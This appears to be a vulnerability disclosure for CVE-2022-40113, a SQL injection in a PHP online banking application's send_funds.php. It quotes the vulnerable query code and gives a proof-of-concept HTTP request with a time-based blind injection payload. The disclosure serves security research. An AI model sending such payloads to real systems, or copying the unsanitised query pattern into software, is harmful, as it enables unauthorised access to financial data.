Headline
CVE-2022-40113: BugReport/sql_injection3.md at main · 0clickjacking0/BugReport
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/send_funds.php.
Permalink
Vulnerability file address
net-banking/send_funds.php from line 9,The $_GET[‘cust_id’] parameter is controllable, the parameter cust_id can be passed through get, and the $id is not protected from sql injection, line 13 $result0 = $conn->query($sql0); made a sql query,resulting in sql injection
… … … if (isset($_GET[‘cust_id’])) { $id = $_GET[‘cust_id’]; }
$sql0 = "SELECT \* FROM customer WHERE cust\_id=".$id;
$result0 = $conn\->query($sql0);
$row0 = $result0\->fetch\_assoc();
… … …
POC
GET /net-banking/send_funds.php?cust_id=666 AND (SELECT 1043 FROM (SELECT(SLEEP(5)))rbwc) HTTP/1.1 Host: www.bank.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
Attack results pictures